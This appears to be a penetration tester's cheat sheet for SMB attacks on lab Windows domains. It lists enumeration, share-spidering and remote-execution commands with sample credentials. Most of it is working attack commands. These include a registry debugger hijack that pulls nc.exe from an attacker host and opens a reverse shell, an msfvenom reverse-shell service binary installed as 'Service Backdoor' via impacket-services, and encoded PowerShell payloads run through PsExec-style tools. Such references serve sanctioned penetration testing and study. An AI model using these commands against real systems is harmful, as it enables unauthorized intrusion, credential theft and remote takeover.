SMB

Resources

• Exploitation
  • By hackingarticles : https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/
  • By 0xdf : https://0xdf.gitlab.io/cheatsheets/smb-enum#check-for-vulnerabilities

Commands

• Recon
  • Nmap

    nmap 172.20.0.52 -sV -sC -p139,445 -Pn
    nmap --script smb-vuln* 172.20.0.52

  • Nbtscan

    nbtscan -r 172.20.0.0-255 -v

  • smbmap

    smbmap -H 172.20.0.52 => open shares
    smbmap -u Helen -p RedRiot88 -H 172.20.0.52

  • smbclient

    smbclient -L 172.20.0.52 -U "Helen%RedRiot88"
     
    smbclient //10.129.228.253/Public -U '%' -c 'get "SQL Server Procedures.pdf"'

  • rpcclient

    rpcclient -U "Helen%RedRiot88" 172.20.0.52
    rpcclient -U "" -N 172.20.0.52

  • nxc

    nxc smb 172.20.0.52 -u Helen -p 'RedRiot88' --shares
    nxc smb 172.20.0.52 -u Helen -p 'RedRiot88' -M spider_plus -o STATS_FLAG=False

  • smbcrawler

    smbcrawler crawl -u administrator -p Password123#a -t 10 -D 2 -w -i hosts.txt

  • impacket-lookupsid

    impacket-lookupsid 'inlanefreight.local/Helen:RedRiot88@172.20.0.52'

  • enum4linux-ng

    enum4linux -u Helen -p RedRiot88 -a 172.20.0.52
    enum4linux-ng -u Helen -p RedRiot88 -A 172.20.0.52

  • manspider

    manspider 172.20.0.52 -u Helen -p 'RedRiot88' -d inlanefreight.local -t 256 -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg pfx cfg conf config vmdk vhd vdi dit

  • net

    net view \\172.20.0.52 /ALL
     
    net view CASTELBLACK
    net share
    net use x: \\CASTELBLACK\all

  • Powerview

    Get-NetShare -ComputerName CASTELBLACK
     
    Find-DomainShare -CheckShareAccess -Verbose
     
    Get-PathAcl "\\castelblack.north.sevenkingdoms.local\all"
     
    Find-InterestingDomainShareFile -Verbose => The best

  • snaffler

    Snaffler.exe -o C:\Users\helen\Desktop\log.txt -s -c DC01.inlanefreight.local
     
    .\loader.exe -path "http://192.168.99.22/exe/Snaffler.exe" -args " -s "

  • Invoke-HuntSMBShares

    Invoke-HuntSMBShares -Threads 100 -OutputDirectory C:\Users\helen\Desktop

• Exploitation
  • Impacket
    • Psexec

      impacket-psexec 'inlanefreight.local/Helen:RedRiot88@172.20.0.52'

    • smbserver

       impacket-smbserver share -smb2support /root/Tools/netcat-win32-1.12/nc64.exe
       rlwrap nc -nlvp 7777
       
       reg.exe add "\\srv02.inlanefreight.local\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msedge.exe" /v Debugger /t reg_sz /d "cmd /c copy \\10.10.16.6\share\nc.exe && nc.exe -e \windows\system32\cmd.exe 10.10.16.6 7777"
       reg.exe add \\srv02.inlanefreight.local\HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters /v AllowInsecureGuestAuth /d 1 /t REG_DWORD /f

    • smbexec

      impacket-smbexec "INLANEFREIGHT/helen:RedRiot88@172.20.0.52"

    • services

       impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 list
       msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.6 LPORT=7777 -f exe-service -o rshell-7777s.exe
       impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 create -name 'Service Backdoor' -display 'Service Backdoor' -path "\\\\10.10.16.6\\share\\rshell-7777.exe"
       impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 config -name 'Service Backdoor'
       impacket-smbserver share -smb2support ./
       rlwrap nc -nlvp 7777
       impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 start -name 'Service Backdoor'
       impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 delete -name 'Service Backdoor'
       
       OR 
       
       impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 config -name Spooler
       impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 change -name Spooler -path "\\\\10.10.14.207\\share\\rshell-9001.exe" -start_type 2
      rlwrap nc -nlvp 7777
      impacket-smbserver share -smb2support ./
      impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 start -name Spooler

    • atexec

      impacket-atexec INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 "powershell -e JABjAGwAaQ...."

  • psexeccsvc

    python3 psexecsvc.py 'inlanefreight.local/Helen:RedRiot88@172.20.0.52' -service-name nothacker -remote-binary-name notshell -user
    

  • psexec.exe

    .\PsExec.exe \\SRV02 -i -u INLANEFREIGHT\helen -p RedRiot88 cmd -accepteula
    .\PsExec.exe \\SRV02 -i -s cmd -accepteula

  • SharpNoPSEexec.exe

    # Attacker 
    rlwrap nc -nlvp 7777
     
    # Victum
    .\SharpNoPSExec.exe --target=172.20.0.52 --payload='c:\windows\system32\cmd.exe /c powershell -e JABjAGwA......'

  • NimExec.exe

    rlwrap nc -nlvp 7777
    .\NimExec.exe -u helen -d inlanefreight.local -p RedRiot88 -t 172.20.0.52 -c 'cmd.exe /c powershell -e JABjAG

Tools

• snaffler : https://github.com/SnaffCon/Snaffler
• Manspider : https://github.com/blacklanternsecurity/MANSPIDER
• PowerHuntShares : https://github.com/NetSPI/PowerHuntShares
• susinternals : https://github.com/sensepost/susinternals
• SharpNoPSExec : https://github.com/juliourena/SharpNoPSExec
• NimExec : https://github.com/frkngksl/NimExec
• smbccrawler : https://github.com/SySS-Research/smbcrawler